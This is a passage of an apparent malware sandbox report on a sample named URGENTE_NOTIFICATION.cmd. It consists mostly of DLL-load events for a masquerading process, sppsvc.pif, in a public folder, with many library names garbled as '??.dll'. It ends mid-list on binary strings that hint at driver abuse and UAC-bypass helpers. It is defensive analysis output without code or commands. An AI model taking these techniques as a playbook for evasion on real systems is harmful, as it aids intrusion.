Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ???y.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ???y.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ???y.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ????.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ????.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ????.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ???2.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ???2.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ???2.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ???.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ???.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ???.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??????s.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??????s.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??????s.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: winhttpcom.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll	Jump to behavior

Source: C:\Users\Public\Libraries\sppsvc.pif

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: URGENTE_NOTIFICATION.cmd

Static file information: File size 4541473 > 1048576

Source:	Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: sppsvc.pif, 00000009.00000003.1813378513.000000007FBF0000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 00000009.00000002.4113851046.0000000013B55000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 00000009.00000003.1813038389.000000007E8C0000.00000004.00001000.00020000.00000000.sdmp, Mywiztwu.PIF, 00000018.00000002.1951246492.000000000256F000.00000004.00001000.00020000.00000000.sdmp, Mywiztwu.PIF, 00000018.00000002.1997696296.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: easinvoker.pdb source: sppsvc.pif, 00000009.00000002.4113851046.0000000013AF5000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 00000009.00000002.4113851046.0000000013B55000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 00000009.00000003.1813038389.000000007E8C0000.00000004.00001000.00020000.00000000.sdmp, Mywiztwu.PIF, 00000018.00000002.1951246492.000000000256F000.00000004.00001000.00020000.00000000.sdmp, Mywiztwu.PIF, 00000018.00000002.1997696296.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp, easinvoker.exe.9.dr
Source:	Binary string: cmd.pdbUGP source: alpha.exe, 00000003.00000002.1647471611.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000003.00000000.1644562863.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000005.00000000.1647785940.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000005.00000002.1653434339.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000007.00000002.1660935260.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000007.00000000.1654132001.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000A.00000000.1662066219.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000A.00000002.1663916561.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000B.00000000.1664317831.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 